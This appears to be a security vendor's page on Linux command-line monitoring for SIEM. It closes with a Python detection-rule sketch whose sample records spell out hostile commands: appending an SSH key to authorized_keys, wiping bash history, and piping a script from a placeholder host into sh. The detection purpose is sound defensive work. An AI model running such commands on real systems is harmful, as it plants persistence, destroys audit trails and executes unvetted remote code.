As demand for visibility into the organization's systems grows, one of the most significant blind spots remains Linux/Unix activity and the ability to track it.
A large portion of the core components and critical systems in the organization run a Linux operating system, for example:
- Network components: switches, routers, firewalls, IPS, WAF
- Virtualization: VMware, ESX, Docker
At Cyray, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).
OS Audit:
- Change passwords of existing accounts
- Unlock or un-expire locked or expired accounts
- Create new accounts
- Delete accounts
- Delete log files
- Change log files
- Delete or change system configuration files
- USB drive connections
- Mount activities
Linux CLI:
We have developed a unique capability that collects every command users run on the operating system and delivers it to the SIEM as a log enriched with additional context. This gives our customers a much more robust defensive capability on top of OS Audit.
Each log supplies the following fields:
- Time
- Server name
- Username
- Command
- Execution path
- Operating system type
- SSH session
- SSH source address
- SSH source hostname
- Source Port
- Destination port
A few additional examples of monitoring capabilities developed by Cyray's team and used by our customers:
- Activity involving the ‘aliases’ file.
- Activity involving the ‘passwd’ file.
- Activity involving the SSH ‘authorized_keys’ file.
- Command history was deleted.
- The user started a simple HTTP server using Python.
- The user downloaded and ran an executable file from the Internet.
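As an added example (not Cyray's code), the following Python sketches how a SIEM-side rule set could consume the enriched command records described under Linux CLI and flag the cases listed above, using the SSH source field to raise severity for sessions that do not come from a known jump host. The field names, sample records, rule patterns and the jump-host allowlist are constructed assumptions for illustration.

```python
import re

# Added example, not Cyray's code: field names, sample records, rule patterns and
# the jump-host allowlist are constructed assumptions for illustration.
READ_ONLY = {"cat", "less", "more", "grep", "head", "tail", "stat", "ls"}
JUMP_HOSTS = {"10.10.0.5"}  # assumed allowlist of administrative jump hosts
# File rules count only when the verb can modify the file; exec rules always fire.
FILE_RULES = [
    ("passwd_file", re.compile(r"/etc/(passwd|shadow|group)\b")),
    ("aliases_file", re.compile(r"/etc/aliases\b")),
    ("ssh_authorized_keys", re.compile(r"authorized_keys\b")),
    ("history_deleted", re.compile(r"history\s+-c\b|\.bash_history\b|\bHISTFILE\b")),
]
EXEC_RULES = [
    ("python_http_server",
     re.compile(r"\bpython[23]?(?:\.\d+)?\s+-m\s+(?:http\.server|SimpleHTTPServer)\b")),
    ("download_and_execute",  # pipe-to-shell, or fetch followed by chmod +x / ./run
     re.compile(r"\b(?:curl|wget)\b(?:[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
                r"|.*(?:;|&&)\s*(?:chmod\s+\+x|\./))")),
]

def rec(user, ssh_src, command):  # one constructed record with the page's field set
    return {"time": "2024-01-10T09:12:01Z", "server": "web01", "user": user,
            "command": command, "cwd": "/home/" + user, "os": "Linux",
            "ssh_session": "pts/1", "ssh_src": ssh_src, "ssh_src_host": "unknown",
            "src_port": 50122, "dst_port": 22}

SAMPLE_RECORDS = [
    rec("alice", "10.10.0.5", "sudo vi /etc/passwd"),
    rec("alice", "10.10.0.5", "cat ~/.bash_history"),
    rec("bob", "192.0.2.44", "echo 'ssh-ed25519 CONSTRUCTED_KEY' >> ~/.ssh/authorized_keys"),
    rec("bob", "192.0.2.44", "history -c && rm -f ~/.bash_history"),
    rec("bob", "192.0.2.44", "python3 -m http.server 8000"),
    rec("bob", "192.0.2.44", "curl -s http://example.invalid/setup.sh | sh"),
]

def _verb(command):  # first program on the line, skipping a leading sudo
    words = command.split()
    if words and words[0] == "sudo":
        words = words[1:]
    return words[0] if words else ""

def classify(record):
    """Return (severity, matched rule names) for one enriched command record."""
    cmd = record["command"]
    hits = [name for name, rx in EXEC_RULES if rx.search(cmd)]
    if _verb(cmd) not in READ_ONLY:  # reading passwd or history is routine
        hits += [name for name, rx in FILE_RULES if rx.search(cmd)]
    # The SSH source field is what lets the same command escalate in severity.
    severity = "none" if not hits else "medium" if record["ssh_src"] in JUMP_HOSTS else "high"
    return severity, hits
```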